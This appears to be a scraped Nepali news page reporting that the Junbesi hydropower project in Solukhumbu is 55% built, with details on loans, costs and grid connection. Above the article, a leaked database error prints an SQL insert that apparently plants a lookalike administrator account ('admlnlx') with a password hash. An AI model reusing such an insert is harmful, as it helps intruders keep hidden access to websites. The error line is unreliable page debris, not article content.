WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV9SflqZVKUE9mN5eSReEFRh2QJkse0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:40:18', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १४ बैशाख, सोलुखुम्बु । सोलुखुम्बु जुनाबेसीमा निर्माणाधीन ५.२ मेगावाटको जुनबेँसी जलविद्युत आयोजना ५५ प्रतिशत पूरा भएको छ । २०७३ देखि निर्माण सुरु भएको आयोजनाको आधा भन्दा बढी काम सकिएको दोभान हाइड्रोपावर कम्पनीले जनाएको छ ।
आयोजनाको पेनस्टन पाइपलाइन र विधुतगृहको काम एक साथ अघि बढेको आयोजनाको बाँध क्षेत्रको काम सकिएको छ कम्पनिले जनाएको छ । ‘आयोजनाको ४ सय मिटर लामो पेनस्टक पाइपलाइनको काम ४० प्रतिशत पूरा भएको जनाएको छ ।
असारबाट निर्माण सुरु भएको आयोजना २०७६ मंसिरमा सम्पन्न गर्ने लक्ष्य राखिएको छ । आयोजनामा सानिमा बैंकको अगुवाइमा ४ बैंकको ऋण लगानी छ । आयोजना सम्पन्न गर्न ९६ करोड लागत अनुमान गरिएपनि मूल्य वृद्धिका कारण करिब १ अर्ब १५ करोडमा पूरा गर्न लक्ष्य लिइएको कम्पनीले जनाएको छ ।
निर्माणाधीन आयोजनाको क्षमता विस्तार गरेर ६ मेगावाट बनाउने तयारी भएपनि प्रक्रिया लामो भएकाले कम्पनीले ५.२ मेगावाट नै निर्माण गर्ने निर्णय गरेकाे छ । निर्माण पूरा भएपछि उत्पादन हुने विद्युत सोलु कोरिडोरको लम्माने सबस्टेसनमा लगेर जोडिने छ । तर, प्रसारण लाइन समयमा पूरा नभएमा वैकल्पिकरूपमा सल्लेरी सबस्टेसनमा जोडिने पनि कम्पनीले जनाएको छ ।